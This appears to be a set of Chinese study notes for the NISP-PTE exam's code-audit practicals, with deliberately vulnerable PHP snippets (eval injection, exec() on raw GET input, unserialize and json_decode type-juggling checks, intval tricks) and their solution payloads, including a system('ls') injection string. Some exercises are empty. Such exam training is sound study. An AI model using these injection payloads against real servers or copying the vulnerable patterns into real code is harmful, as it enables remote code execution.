NISP-PTE基础实操——代码审计

pte代码审计模拟1

源代码如下：

<?php 
error_reporting(0); 
$a = $_GET['a']; 
eval("\$ret = strtolower(\"$a\");"); 
echo $ret; 
show_source(__FILE__); 
?>

• 接收参数 $a，构造为：

  eval("$ret = strtolower(\"$a\");");

• eval() 动态执行，构成代码注入点；

• show_source(__FILE__) 可看到源码，确认存在 eval()；

• strtolower() 是幌子，核心漏洞在于 $a 被无过滤拼接进 eval 字符串，可以闭合字符串并注入任意语句。

🚨 1. 漏洞本质

• 代码注入 + eval 执行；

• 你可以闭合 strtolower(") 后直接注入任意 PHP 代码；

• 攻击载荷执行在服务器端，能使用的函数包括 system()、passthru()、shell_exec()、file_get_contents() 等。

🚀 2. 验证 RCE 是否可行

测试命令执行：

/index.php?a=");system("ls");//

执行逻辑还原：

eval('$ret = strtolower("");system("ls");//");');

此时 system("ls") 被执行，终端结果回显。

/index.php?a=");system("ls

pte代码审计模拟2

<?php
error_reporting(0); 
show_source(__FILE__);
if(strlen($_GET[1]<30)){
    echo strlen($_GET[1]);
    echo exec($_GET[1]);
}else{
    exit('too more');
}
?>

pte代码审计模拟3

<?php
error_reporting(0);
include "flag.php";
$TEMP = "CISP";
$str = $_GET['str'];
if (unserialize($str) === $TEMP)
{
    echo "$flag";
}
show_source(__FILE__);

/index.php?str=s:4:"CISP";
/index.php?str=s%3A4%3A"CISP"%3B 

pte代码审计模拟4

<?php
$v1 = 0;
$v2 = 0;
$a = (array)json_decode(@$_GET['w']);
if (is_array($a)) {
    is_numeric(@$a["bar1"]) ? die("nope") : NULL;
    if (@$a["bar1"]) {
        ($a["bar1"] > 2020) ? $v1 = 1 : NULL;
    }
    if (is_array(@$a["bar2"])) {
        if (count($a["bar2"]) != 5 or !is_array($a["bar2"][0])) {
            die("nope");
        }
        $pos = array_search("cisp-pte", $a["bar3"]);
        $pos === false ? die("nope") : NULL;
        foreach ($a["bar2"] as $key => $val) {
            $val == "cisp-pte" ? die("nope") : NULL;
        }
        $v2 = 1;
    }
}
if ($v1 && $v2) {
    include "key.php";
    echo $key;
}
highlight_file(__file__);
?>

/?w={"bar1":"2025a","bar2":[[],"a","b","c","d"],"bar3":["cisp-pte"]}

pte代码审计模拟6

阅读源码，获取flag。


$tis = "我们可以让您生活更轻松";

$gp = $_GET['cx'];


if($gp) {

if(preg_match("/[0-9]/", $gp)) {

$tis = "输入的只能是字符";

} else {

if(intval($gp)) {

$flag = @file_get_contents("../../../flag.txt");

if($flag === false) {

$flag = "flag{file_not_found}";

}

$tis = $flag;

} else {

$tis = "只差一步就可以拿到Flag";

}

}

}

?>

pte代码审计模拟7

pte代码审计模拟8

某些PHP intval函数在处理时会出现些问题!


$gp = isset($_GET['cx']) ? $_GET['cx'] : '';


if ($gp) {

if(intval(" .$gp.")<1001 && intval($gp +1)>10000){

$flag = file_get_contents("../../../flag.txt");

$tis = "验证通过！Flag: " . $flag;

$class = "success";

} else {

$tis = "验证失败，请检查输入参数";

$class = "error";

}

} else {

$tis = "请输入测试参数";

$class = "error";

}

pte代码审计模拟9

一个json对象搞定 

pte代码审计模拟10

O:4:"User":1:{s:5:"admin";O:5:"Admin":0:{}}